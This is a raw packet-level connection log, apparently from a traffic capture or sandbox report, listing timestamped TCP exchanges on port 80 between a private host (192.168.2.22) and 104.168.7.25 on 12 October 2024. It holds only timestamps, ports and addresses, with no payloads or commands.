Oct 12, 2024 16:39:57.617830992 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617831945 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617847919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617860079 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617873907 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617873907 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617891073 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617901087 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617914915 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617918968 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617930889 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617938995 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617949009 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617960930 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617964983 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617976904 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.617989063 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.617990017 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618005991 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618006945 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618024111 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618036032 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618038893 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618052959 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618056059 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618069887 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618071079 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618083954 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618088961 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618098974 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618104935 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618118048 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618122101 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618139982 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618143082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618156910 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618170023 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618174076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618181944 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618190050 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618206024 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618208885 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618217945 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618237972 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618244886 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618253946 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618262053 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618277073 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618294001 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618302107 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618310928 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618316889 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618319988 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618335962 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618343115 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618352890 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618361950 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618381023 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618402958 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618406057 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618421078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618437052 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618453026 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618465900 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618474960 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618495941 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618515015 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618530989 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618546009 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618577957 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618587017 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618747950 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618767977 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618792057 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618798018 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618805885 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618808985 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618825912 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618834019 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618840933 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618844032 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618858099 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618858099 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618875027 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618879080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618886948 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618891954 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618906975 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618920088 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618923903 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618938923 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618942022 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618953943 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618958950 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618968964 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.618974924 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.618989944 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619000912 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619000912 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619005919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619033098 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619033098 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619048119 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619048119 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619076014 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619090080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619091034 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619107962 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619115114 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619133949 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619141102 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619141102 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619151115 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619165897 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619168997 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619184017 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619193077 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619199038 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619214058 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619216919 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619224072 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619230032 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619250059 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619251966 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619268894 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619281054 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619282007 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619283915 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619307041 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619316101 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619323969 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619323969 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619349003 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619349957 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619366884 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619376898 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619393110 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619415045 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619415045 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619452000 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619471073 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619482994 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619524002 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619533062 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619541883 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619566917 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619580984 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619580984 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619600058 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619609118 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619616032 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619632959 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619648933 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.619677067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619677067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619677067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619677067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619713068 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.619889975 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.674490929 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.674509048 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.674525976 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.674540997 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.674556017 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.674562931 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.674577951 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.674578905 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.674588919 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.674607992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.674616098 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707159996 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707190037 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707205057 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707259893 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707274914 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707289934 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707299948 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707300901 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707304955 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707313061 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707348108 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707348108 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707412958 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707428932 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707443953 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707458973 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707479954 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707480907 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707493067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707496881 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707503080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707514048 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707529068 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707542896 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707544088 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707556963 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707567930 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707576036 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707581043 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707596064 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707602978 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707619905 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707629919 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707636118 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707650900 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707655907 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707665920 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707673073 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707691908 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707700968 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707700968 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707707882 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707724094 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707731009 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707740068 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707758904 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707762957 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707775116 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707781076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707783937 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707796097 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707807064 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707812071 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707820892 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707828999 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707837105 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707844973 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707855940 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707860947 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707870007 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707875967 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707889080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707902908 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707911968 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707921028 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707926035 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707942009 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707957029 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707957983 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707973957 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.707979918 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707979918 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707981110 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.707988977 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708004951 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708005905 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708017111 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708020926 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708034039 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708038092 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708050966 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708051920 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708058119 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708076954 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708079100 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708093882 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708108902 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708118916 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708118916 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708125114 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708137035 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708142042 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708158970 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708165884 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708165884 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708178043 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708211899 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708245993 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708261013 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708275080 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708290100 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708292961 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708301067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708304882 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708321095 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708322048 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708336115 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708342075 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708352089 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708364964 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708373070 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708380938 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708388090 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708395958 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708411932 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708420038 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708425999 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708435059 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708436012 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708441973 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708458900 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708472967 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708481073 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708487988 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708499908 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708503962 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708518028 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708520889 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708533049 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708537102 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708544970 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708554983 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708564043 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708570004 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708580971 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708585978 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708600044 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708604097 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708610058 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708630085 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708637953 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708703995 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708868980 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708892107 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708906889 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708920956 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708929062 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708936930 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708937883 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708962917 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708970070 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.708981991 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.708986044 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709011078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709011078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709026098 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709027052 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709043026 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709053993 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709059954 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709073067 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709074974 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709088087 CEST	49170	80	192.168.2.22	104.168.7.25
